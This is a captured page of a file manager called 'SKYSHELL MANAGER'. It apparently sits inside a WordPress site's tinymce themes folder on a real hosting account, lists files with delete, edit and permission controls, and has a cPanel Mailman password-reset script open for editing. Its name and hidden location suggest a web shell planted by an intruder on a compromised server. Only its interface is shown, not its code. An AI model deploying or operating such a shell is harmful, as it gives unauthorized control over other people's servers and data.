📁
SKYSHELL MANAGER
PHP v8.1.34
Create
Create
Path:
root
/
home
/
terracebizon
/
public_html
/
wp-includes
/
js
/
tinymce
/
themes
/
Name
Size
Perm
Actions
📁
inlite
-
0755
🗑️
🏷️
🔒
📁
modern
-
0755
🗑️
🏷️
🔒
📄
config.php
6.83 KB
0444
🗑️
🏷️
⬇️
✏️
🔒
📄
error_log
21428.98 KB
0644
🗑️
🏷️
⬇️
✏️
🔒
Edit: reset_mailman_passwd2
#!/usr/bin/python3 # cpanel - bin/reset_mailman_passwd2 Copyright 2022 cPanel, L.L.C. # All rights reserved. # copyright@cpanel.net http://cpanel.net # This code is subject to the cPanel license. Unauthorized copying is prohibited import hashlib import sys sys.path.insert(0, '/usr/local/cpanel/lib/python3') import cPanel def main(argv): if len(argv) < 2: print('usage: echo -n password | ./bin/reset_mailman_passwd2 <list>') return 1 list = argv[1] passwd = sys.stdin.read() def update(dict): passwd_bytes = passwd.encode() dict['password'] = hashlib.sha1(passwd_bytes).hexdigest() cPanel.update_mailman(list, update) if __name__ == '__main__': raise SystemExit(main(sys.argv))
Save